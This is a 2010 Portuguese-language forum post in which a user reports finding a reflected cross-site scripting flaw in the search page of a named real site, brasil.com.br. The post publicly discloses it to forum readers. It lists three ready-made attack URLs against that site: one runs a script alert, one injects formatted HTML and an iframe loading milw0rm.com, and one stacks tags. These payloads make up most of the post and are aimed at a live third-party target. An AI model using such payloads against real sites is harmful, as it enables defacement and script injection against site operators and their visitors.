Brasil.com.br - Cross site scripting

Started by andrezc, 01 de May , 2010, 01:32:58 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

andrezc

01 de May , 2010, 01:32:58 AM
Ontem pela madrugada, eu estava fazendo algumas pesquisas no Google, coisa boba, sem finalidade alguma, procurando sites diferentes, daí, pensei em pesquisar por "Brasil", daí, cheguei até o site:

http://brasil.com.br/

Quando fui realizar uma pesquisa nele, me deparo com o que eu havia digitado. Eu pensei Opa! Já que estou aqui, realizarei alguns testes...

E olha só o que eu achei:

http://brasil.com.br/busca?q=%3Cscript%3Ealert%28%22XSS+++%3A%28%22%29%3C%2Fscript%3E&commit=Buscar

http://brasil.com.br/busca?q=%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cstrong%3EXSS%3Cbr%3E%3Cbr%3EAndreZC+%3Cbr%3E+%3Ciframe+src%3D%22http%3A%2F%2Fwww.milw0rm.com%2F%22%3E%3C%2Fiframe%3E&commit=Buscar

http://brasil.com.br/busca?q=%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3EXSS&commit=Buscar

É isso, achei que alguns aqui do fórum iriam gostar de saber.

Até.
Print
Go Up Pages1
User actions